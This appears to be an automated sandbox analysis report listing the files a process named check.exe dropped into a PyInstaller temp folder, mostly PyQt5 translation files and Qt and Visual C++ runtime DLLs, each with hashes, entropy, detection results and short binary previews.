                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):156799
                                                                                                                                                                                                                                      Entropy (8bit):5.859529082176036
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:rvTy18hhPekHs1iNXVExWbStnn8TExgkYOvYejZOvXx4Mmf0MwUL8smk/pDZyy:y18hJ61nMStnn8TOgknQRLWZmkxNyy
                                                                                                                                                                                                                                      MD5:082E361CBAC2E3A0849F87B76EF6E121
                                                                                                                                                                                                                                      SHA1:F10E882762DCD2E60041BDD6CC57598FC3DF4343
                                                                                                                                                                                                                                      SHA-256:0179ED1B136E1CB3F583351EAA2C545BA3D83A6EE3F82C32505926A1A5F5F183
                                                                                                                                                                                                                                      SHA-512:F378A42116924E30FA0B8FFF1D3C3CB185DC35B2746DCE2818BE7C2AA95C5DE103DF44AAC74DA969C36C557F1D4DE42AC7647EC41066247F8AD2697BDED667EA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......koB..7....*.......+.......@...K...A...o...B......C.......D...8...E.......F...U...G...y...H......I.......P......Q.......R.......S...C...T...g...U.......V.......W.......X...-...Y...Q...]..$....s...>...t...................y...;..${...;..%....;...u...;...l...M..$....O.......O...8...........}..$............=...C...m..%!...t...n..........(5...a..+;..E@..+;..l|..+O......1.......D@.....E@......H4......HY..\...H....]..IC......J.......J....8..J.......LD...a..L.......PS......QR......R...`...T.......U....^..U.......X....y..Zr......[`..y...\....A..]x......_......._....o..yg......1...FJ...E..HE...7..................Q........a.......5...........$..]....[...;...,.......y.......y...V...............!.......|...9..]....E...R...........z...4.......f.......5...%..Te...D..................D......^.............*...5...S...0.......0.......0.......0.......5.......5...........n......a... D..%... D..[...+.......<?......<U...;..<U...+..<.......H5..&...H5..\...L.......VE......V....A..f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_lv.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153608
                                                                                                                                                                                                                                      Entropy (8bit):4.843805801051326
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:y5pmbKIhooMbGe91MrjOhmGzP6LJbWz5XIxELpU6:yObeqrjPGzeJyJLy6
                                                                                                                                                                                                                                      MD5:BD8BDC7BBDB7A80C56DCB61B1108961D
                                                                                                                                                                                                                                      SHA1:9538C4D8BB9A95C0D9DC57C7708A99DD53A32D1F
                                                                                                                                                                                                                                      SHA-256:846E047573AE40C83671C3BA7F73E27EFC24B98C82701DA0DF9973E574178BB2
                                                                                                                                                                                                                                      SHA-512:F040EC410EBFEA21145F944E71ADCAE8E5F60907D1D3716A937A9A59A48F70C6B7EAAC91C2C554F59357A7BC820CDBD17C73A4DECC20B51F68EB79EDD35C5554
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......lv_LVB.......*...B...+..y....@.......A...=...B......C......D.......E.......F...#...G...G...H...k...I.......P...~...Q......R.......S.......T...5...U...Y...V......W.......X.......Y.......]..%....s.......t...8.......n.......A...;..&....;.......;...!...;...A...;../....M..%....O.......O...............}..%...........=.......m..&....t...(......(g..(5...+..+;..4...+;..d...+O......1...(...D@...a..E@......H4..z...HY..Q...H.......IC......J....6..J.......J.......LD......L....9..PS......QR......R...U...T....S..U.......X...._..Zr......[`..r...\.......]x...*.._......._....{..yg......1...5v...E..7........(......B.......|.......|W......~r...$..R....[..~....,.......y...l...y...............................9..S....E...g...........z...z...................%..F....D........................"Z.....$......)....5.......0...\...0.......0...r...0.......0.......5...a...5..........J......V... D..&... D..P...+.......<U......<U......<.......H5..'"..H5..P...L....~..VE...R..VE..%...V......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_pl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):162982
                                                                                                                                                                                                                                      Entropy (8bit):4.841899887077422
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:sXpestp/YIFtDT8FIWYbIJmPYuIpnmxAk6mwyJNqSm9+P:sxpTDT8FIWfJmdCmxApmbnqSm9+P
                                                                                                                                                                                                                                      MD5:F9475A909A0BAF4B6B7A1937D58293C3
                                                                                                                                                                                                                                      SHA1:76B97225A11DD1F77CAC6EF144812F91BD8734BD
                                                                                                                                                                                                                                      SHA-256:CE99032A3B0BF8ABAD758895CC22837088EAD99FD2D2514E2D180693081CFE57
                                                                                                                                                                                                                                      SHA-512:8A4F1B802B6B81FF25C44251FB4A880E93E9A5FE25E36825A24BFE0EFB34E764E7E1EE585D3A56554964B7921E7813C67F12D200D6E0C5EAF4BB76B064B5C890
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......pl_PLB..0....*.."....+.......@...F...A...j...B......C.......D...3...E.......F...P...G...t...H.......I.......P.......Q.......R.......S...>...T...b...U.......V.......W.......X...(...Y...L...]..*....s.......t...r.......o.......+...;..*....;..+....;..."...;... ...M..*....O...6...O...........a...}..+...........=.......m..+G...t...G......,...(5......+;..:...+;..k...+O......1...-[..D@.....E@......H4...U..HY..WU..H.......IC......J....6..J.......J.......LD......L....%..PS......QR.. ...R...[...T....1..U.......X......Zr......[`......\.......]x...A.._......._....}..yg......1...;W...E..=........%......H....................$..Xp...[.......,.......y...i...y...........}......$R...........9..X....E..+)...........z.. E...................%..K....D...p....................&......(......-....5.......0.......0...e...0.......0..+....5...]...5...........f......]-.. D..,%.. D..V?..+....V..<U......<U......<....-..H5..,M..H5..V...L....Z..VE..!...VE..)...V.......f...P...f....K..f......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_ru.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):203767
                                                                                                                                                                                                                                      Entropy (8bit):5.362551648909705
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:hn4dEJ63pdhPpy6gu5fs4MHQv6sLlxnrncF423ZL9xyuXwdcX8LZuf76CW+WeXFx:aN3pdV5fZbpItXsttRY+WSq
                                                                                                                                                                                                                                      MD5:5096AD2743BF89A334FBA6A2964300D4
                                                                                                                                                                                                                                      SHA1:405F45361A537C7923C240D51B0FF1C46621C203
                                                                                                                                                                                                                                      SHA-256:3DA6605668F9178D11A838C4515478084DCFB4F9CF22F99D7A92B492DB9C224B
                                                                                                                                                                                                                                      SHA-512:7B88B501792B5831426BAA669138192ED94CC3F8323A3DF9D5287655DC4D877706908C517AB7523AE8A283BF50B47123F13B8AE40EA2F3081C3459EDC47FC8DD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ru_RUB..7....*...L...+...W...@..,....A..,....B..-1...C..-U...D..-....E...r...F.......G.......H../....I../8...P..1'...Q..1K...R..1....S..1....T..1....U..2....V..2\...W..2....X..2....Y..2....].......s..$c...t...'......%........r...;..-....;.......;..J....;..V....M...C...O.......O..&.......8....}...m......+3...=..+....m.......t..+.......p...(5..]@..+;..[0..+;......+O..H...1...qM..D@..-...E@..1o..H4...p..HY..xm..H....*..IC...@..J....g..J.......J.......LD......L....p..PS......QR..!...R...}...T...&...U...'...U...ki..X...+...Zr..3...[`......\...:...]x..)..._......._...;...yg..S...1...\....E..__...7.........H.......k................j.......U...$..y....[.......,.......y...k...y...............................9..y....E...O...........z..!*...................%..nW...D.................%w.....g......j~.....qw...5...H...0.......0..I....0..._...0......5.......5..................~... D../k.. D..wa..+....?..<?.."t..<U......<U.."...<...#z..H5../...H5..w...L...&...VE.."...V...F$.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_sk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):125763
                                                                                                                                                                                                                                      Entropy (8bit):4.80343609423322
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:roXDuC1u/2lUBGjJirE5tsd/aev1GIfOdvhw:OucMGjH5tbm
                                                                                                                                                                                                                                      MD5:3D60E50DCBCBD70EE699BC9B1524FCB9
                                                                                                                                                                                                                                      SHA1:0211B4911B5B74CC1A46C0FCA87D3BF5632AA44A
                                                                                                                                                                                                                                      SHA-256:D586AE2C314074CF398417FDECB40709D5478DFEB0A67C2FE60D509EE9B59ED7
                                                                                                                                                                                                                                      SHA-512:F98211867F1DBCB8A342C00E23FA5718BE6E999F7449CB8470B41BF0F527C7F78CC4D6666E28968F32E96026907156753979BFADA7E6BF4225D02A902D24906D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......sk_SKB..$x...*.......+..>....@......A......B.......C.......D...3...E...Z...F......G......H.......I.......P.......Q...D...R.......S......T.......U.......V...1...W...X...X.......Y......]...Y...t..D-......K....;...3...;.......;.......;......;...V...M.......O.._ ......l....}.......m...........T..(5...(..+;......+;..%...+O......1......E@...k..F.......H4..?I..HY..@7..H...J...I....,..IC..HT..J...H{..J...H...LD..J"..L...Jv..PS..Q...R...D...Zr..i]..[`..7...\...nB.._...o...1...&....E..(........B......19......A.......A....$..AF...[..C....,..D....y..G.......v........g......G....9..A....E..........IH...%..4.......Kf..............................5..K....0...,...0.......0.......0..Of...0.......5..P....5..........E... D...C.. D..?'..+...Y`..<U......<U..\...<...]...H5...m..H5..?...L...^...VE......f.......f...8...g.......l...aP.......................6......d....D..f(...`..f...............?....`..h5...y..H....5..j........E...e.......e..@....... ......>......oZ......l..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_tr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):194487
                                                                                                                                                                                                                                      Entropy (8bit):4.877239354585035
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:yRRhAFCvqDBitD/iDG9AOH+l4TcwZBPqHo9fd9CFRK+2IKAimxsjucV2p0ZqvRu7:yRRHs5mksWVX3lA3
                                                                                                                                                                                                                                      MD5:6CBC5D8E1EABEC96C281065ECC51E35E
                                                                                                                                                                                                                                      SHA1:4E1E6BA3772428227CB033747006B4887E5D9AD1
                                                                                                                                                                                                                                      SHA-256:6A0BF6E70E7920C2B193E76E92F78F315936955D3B06AC039D917F2E06C43281
                                                                                                                                                                                                                                      SHA-512:CE1F9EE180176153D5F523D71E0DB06F4DEA65C24E5E2CD56341CFAEE349A8E9A0F606D99F7219A35DD4516D1528C90AEA4BB87548A55392B8F2B36164D478B1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......tr_TRB..7....*.......+...-...@.......A.......B.......C...%...D.......E...F...F.......G.......H.......I.......P.. ....Q.. ....R..!D...S..!h...T..!....U..!....V.."....W.."0...X.."T...Y.."x...]..,g...s.../...t......................;..,9...;..-I...;..9@...;..E....M..,....O.......O...G...........}..,............=...\...m..,....t.........._3..(5..LJ..+;..Wt..+;...\..+O..7...1..._...D@......E@..!...H4...@..HY..t...H....2..IC...r..J......J....D..J....K..LD...$..L....x..PS......QR..!...R...x...T.......U....q..U...Y...X...."..Zr...%..[`......\....:..]x......_......._.......yg..6...1...X....E..[....7...Z......7Q......f............................$..u....[...:...,...5...y.......y...........7...............!...9..u....E...........P...z.. ........p...........%..j....D..................A.....U......Y......_....5...V...0.......0..8....0...U...0.......5.......5..~b..............z+.. D..-... D..s...+.......<?...8..<U...s..<U...p..<.......H5..-...H5..s...L.......VE.."0..V...4..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_uk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):158274
                                                                                                                                                                                                                                      Entropy (8bit):5.402056706327934
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:jXwjFVUDdMUD4TzdAhpQgO5poZHvJllEnhmdK4I77/dnPJX/imfb1jhvv3BxT8ue:jBzD4Tzaw5pCvJ8hVPdlvj3p8
                                                                                                                                                                                                                                      MD5:D6234E4E21021102B021744D5FA22346
                                                                                                                                                                                                                                      SHA1:63A14327D0CF0941D6D6B58BFA7E8B10337F557B
                                                                                                                                                                                                                                      SHA-256:51B8FF55B37DC5907D637A8DDDA12FBE816852B0244C74EB4F0FB84867A786E0
                                                                                                                                                                                                                                      SHA-512:37D24A092C5F29BACB7A4CA8207C4EEFD0F073B7E74A492402867F758084091BF1D79D2BA2B4A28B35FEF42E8023C371FDE97578F74BB2033551154E77102DE6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......uk_UAB../....*...E...+...l...@.......A.......B...G...C...k...D.......E.......F.......G.......H...*...I...N...P...=...Q...a...R.......S.......T.......U.......V...r...W.......X.......Y.......]..*y...s.......t...........;.......n...;..*Q...;..+U...;.......;...x...;..!(...M..*....O.......O...........6...}..*........E...=.......m..*....t..........3...(5..&...+;..:...+;..k0..+O...A..1...4-..D@... ..E@......H4...8..HY..W...H....2..IC...V..J....}..J.......J....%..LD...&..L....z..PS......QR.. ...R...\...T....(..U.......X.......Zr......[`..~...\.......]x......_......._....4..yg...c..1...;....E..=w.......m......I............................$..X....[...<...,.......y.......y...........M...................9..Y....E...F.......D...z.. ........P...........%..LB...D.......................-n...../......4W...5...F...0...p...0...W...0.......0...k...0.......5.......5..................^... D..+... D..V...+.......<U.../..<U......<....>..H5..+...H5..V...L....S..VE..!...VE..0...V......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_zh_TW.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):127849
                                                                                                                                                                                                                                      Entropy (8bit):5.83455389078597
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:Fv2cHP10gOs6dcFxsJopMqOWv2WIrPFP8pa:Fh6s6iFxEodjef8pa
                                                                                                                                                                                                                                      MD5:9C6A3721D01ECAF3F952CE96F46CE046
                                                                                                                                                                                                                                      SHA1:4A944E9E31DF778F7012D8E4A66497583BFD2118
                                                                                                                                                                                                                                      SHA-256:085D29EAF9BBB788B2F2503D74A1EF963A9411CEB600441254CE49A120E1AB63
                                                                                                                                                                                                                                      SHA-512:6E2807B8785F42A26C9CCBDBA0327DD40B529B10C468593F0E74113774D1CCDAA4FD9ACE9B259B9040E1475911428ECAEA49425B0F170862CF8147D23DB48E46
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zh_TWB..2x...*.......+..)....@.......A.......B...j...C......D.......E......F.......G...)...H...M...I...q...P...%...Q...I...R......S......T.......U.......V...Z...W...~...X......Y.......]..!....s.......t..-...............4....;..!z...;.."|...;.......;.......M..!....O.......O..Ay......N)...}..!............=.......m.." ...t...(.........(5......+;..;...+;.._...+O......1.......D@...C..E@...m..H4..*W..HY..Pm..H...3...IC..1...J...1...J.......J...1...LD..2...L...38..PS..6...QR...T..R...T...T...A...U...A...X...E...Zr..K...[`..$...\...OW..]x......_......._...P...yg..a^..1...<....E..>....7...>.......;......Fo......+.......+.......-L...$..QR...[..-....,...F...y.......y..1J...............6......1p...9..Q....E..........2....z...........<......3....%..H....D..4W......4}....................Z...... ...5..4....0...?...0...K...0..5....0...L...5..6....5..........6.......U... D.."... D..O...+...<%..<U......<U..>...<...?:..H5..#...H5..O...L...AS..VE...M..VE......V.......f...L..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtCore.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2483712
                                                                                                                                                                                                                                      Entropy (8bit):6.241719144701645
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:ZYS8YHrNj4/7RsRLvYpiW3pCBU+Z7bJWvCSBYgbxGJ5M2GM/fXR1fUdihfSbCo6e:9bpj4/7RsRLvYpiW3pCBU+Z7bJWvCSBv
                                                                                                                                                                                                                                      MD5:678FA1496FFDEA3A530FA146DEDCDBCC
                                                                                                                                                                                                                                      SHA1:C80D8F1DE8AE06ECF5750C83D879D2DCC2D6A4F8
                                                                                                                                                                                                                                      SHA-256:D6E45FD8C3B3F93F52C4D1B6F9E3EE220454A73F80F65F3D70504BD55415EA37
                                                                                                                                                                                                                                      SHA-512:8D9E3FA49FB42F844D8DF241786EA9C0F55E546D373FF07E8C89AAC4F3027C62EC1BD0C9C639AFEABC034CC39E424B21DA55A1609C9F95397A66D5F0D834E88E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.........../....td./..../...td./...td./...td./...n../...1../......P...c./....c./....c./...Rich...........................PE..d....p.f.........." ...(.*...........+.......................................0&...........`.............................................L.....................#.$.............%.... t.......................t..(....r..@............@..(o...........................text...~(.......*.................. ..`.rdata..x....@......................@..@.data...h...........................@....pdata..$.....#......n#.............@..@.reloc.......%......L%.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtGui.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2494976
                                                                                                                                                                                                                                      Entropy (8bit):6.232020603277999
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:SUjOoTFrwI8nc6EmRAQ9RzgpP2bXYUKuXeLQp5PjYq0zb:SUqCgnZXRAQ9RzggbozJLQp5Mq
                                                                                                                                                                                                                                      MD5:AE182C36F5839BADDC9DCB71192CFA7A
                                                                                                                                                                                                                                      SHA1:C9FA448981BA61343C7D7DECACAE300CAD416957
                                                                                                                                                                                                                                      SHA-256:A9408E3B15FF3030F0E9ACB3429000D253D3BB7206F750091A7130325F6D0D72
                                                                                                                                                                                                                                      SHA-512:8950244D828C5EDE5C3934CFE2EE229BE19CC00FBF0C4A7CCEBEC19E8641345EF5FD028511C5428E1E21CE5491A3F74FB0175B03DA17588DAEF918E3F66B206A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......... j..sj..sj..sc..sn..s.p.rh..s1..rh..s.p.ri..s.p.rb..s.p.r...s...rh..s..ro..sj..s...syw.ra..syw.rk..syw.rk..sRichj..s........PE..d....p.f.........." ...(.....................................................P&...........`.........................................`&..L....&................$...............%.....................................p...@...............@{...........................text...O........................... ..`.rdata..............................@..@.data...xz.......^...t..............@....pdata........$.......#.............@..@.reloc........%......^%.............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtWidgets.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5144576
                                                                                                                                                                                                                                      Entropy (8bit):6.262739223310643
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:Qi+reIG7QwktsFPKoe2yicbbqgkcY9abW7KnTYK2bjMkTDGM7y:uqT7Q1kyTvoWW7EYvM9M
                                                                                                                                                                                                                                      MD5:E8C3BFBC19378E541F5F569E2023B7AA
                                                                                                                                                                                                                                      SHA1:ACA007030C1CEE45CBC692ADCB8BCB29665792BA
                                                                                                                                                                                                                                      SHA-256:A1E97A2AB434C6AE5E56491C60172E59CDCCE42960734E8BDF5D851B79361071
                                                                                                                                                                                                                                      SHA-512:9134C2EAD00C2D19DEC499E60F91E978858766744965EAD655D2349FF92834AB267AC8026038E576A7E207D3BBD4A87CD5F2E2846A703C7F481A406130530EB0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................=....1M............1M.....1M.....1M.....+......t.............J......J......J.....Rich...........................PE..d....p.f.........." ...(..,...!.....P.,.......................................N...........`..........................................><.T...D?<...............H..z...........pM..O..Pa8..............................`8.@.............,..............................text.....,.......,................. ..`.rdata........,.......,.............@..@.data... :....A.......A.............@....pdata...z....H..|....H.............@..@.reloc...O...pM..P...0M.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\sip.cp313-win_amd64.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):120320
                                                                                                                                                                                                                                      Entropy (8bit):6.034057886020456
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:pPd5NTdYgpmMrZhekwFH4PqgZNBQmT6V6WRFYE9Icx7pz4H5B:NhTdtmMdEkwuFTSvYE9Iczz4H5
                                                                                                                                                                                                                                      MD5:4F7F9E3A9466F4C0103FB04E1987E098
                                                                                                                                                                                                                                      SHA1:D4A339702E936AA5ECC1FE906AE2BA3BB0E481D7
                                                                                                                                                                                                                                      SHA-256:EBF27146466D61411493D2E243EAC691740F9C4B7A4B9AB0D408BE45B5E0AA35
                                                                                                                                                                                                                                      SHA-512:920BA8D58DCA7946341C1CC01FEA0B76CCE008F1D10061F84455A3DE9BA00FD9534F40C983486211BE92B85F786CD610C386529711A6F573A02BFAF8CA543A19
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........kSR...R...R...[...Z....X..P.......P....X..Q....X..Z....X.._....^..Q...R.......G_..[...G_..S...G_..S...G_..S...RichR...........PE..d.... g.........." ...(.H...........J.......................................0............`.............................................X...h................................ ..........................................@............`...............................text...(G.......H.................. ..`.rdata..lU...`...V...L..............@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\VCRUNTIME140.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):120400
                                                                                                                                                                                                                                      Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                      MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                      SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                                      SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                      SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\VCRUNTIME140_1.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):49744
                                                                                                                                                                                                                                      Entropy (8bit):6.701724666218339
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
                                                                                                                                                                                                                                      MD5:68156F41AE9A04D89BB6625A5CD222D4
                                                                                                                                                                                                                                      SHA1:3BE29D5C53808186EBA3A024BE377EE6F267C983
                                                                                                                                                                                                                                      SHA-256:82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
                                                                                                                                                                                                                                      SHA-512:F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.{...{...{...0...y.......y...r.H.p...{...H.......|.......`.......~.......z.....$.z.......z...Rich{...........PE..d...l0.?.........." ...).<...8.......@...............................................b....`A........................................pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text....;.......<.................. ..`.rdata.."#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................

